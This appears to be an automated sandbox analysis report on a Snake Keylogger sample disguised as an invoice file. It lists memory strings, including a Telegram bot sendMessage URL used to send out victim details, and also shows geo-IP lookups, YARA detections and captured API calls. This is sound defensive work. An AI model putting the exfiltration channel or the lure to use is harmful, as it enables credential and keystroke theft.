Source: RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20a
Source: RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 0000000B.00000002.2526741820.0000000002617000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 0000000B.00000002.2526741820.0000000002608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: RegSvcs.exe, 00000008.00000002.2527756944.0000000003175000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000003030000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: ageless.exe, 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.0000000003030000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000B.00000002.2526741820.0000000002500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000008.00000002.2527756944.0000000003061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2527756944.00000000030A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002543000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000008.00000002.2530605379.0000000004003000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 0000000B.00000002.2529344457.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 0000000B.00000002.2526741820.0000000002648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 0000000B.00000002.2526741820.0000000002639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: RegSvcs.exe, 00000008.00000002.2527756944.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2526741820.0000000002643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49873 version: TLS 1.2

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0048EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0048EAFF

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0048ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0048ED6A
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		7_2_00B6ED6A

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

0_2_0048EAFF

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0047AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0047AA57

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_004A9576
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		7_2_00B89576

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ageless.exe.1600000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.ageless.exe.1580000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ageless.exe.1600000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Invoice No 1122207 pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Invoice No 1122207 pdf.exe, 00000000.00000000.1257786969.00000000004D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1e57facf-d
Source: Invoice No 1122207 pdf.exe, 00000000.00000000.1257786969.00000000004D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7f6a01e5-2
Source: Invoice No 1122207 pdf.exe, 00000000.00000003.1266915741.0000000003D81000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_be17a265-7
Source: Invoice No 1122207 pdf.exe, 00000000.00000003.1266915741.0000000003D81000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_85a1fcea-0
Source: ageless.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: ageless.exe, 00000007.00000000.1267347209.0000000000BB2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5ae85681-0
Source: ageless.exe, 00000007.00000000.1267347209.0000000000BB2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2b81f50d-9
Source: ageless.exe, 0000000A.00000002.1412871390.0000000000BB2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cb1dd27b-f
Source: ageless.exe, 0000000A.00000002.1412871390.0000000000BB2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_09d7cd8d-d
Source: Invoice No 1122207 pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_95366675-b
Source: Invoice No 1122207 pdf.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_978778d0-4
Source: ageless.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d52305a4-1
Source: ageless.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_47f74c33-b

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice No 1122207 pdf.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0047D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0047D5EB

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00471201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00471201

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0047E8F6
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		7_2_00B5E8F6

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00482046	0_2_00482046
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00418060	0_2_00418060
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00478298	0_2_00478298
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0044E4FF	0_2_0044E4FF
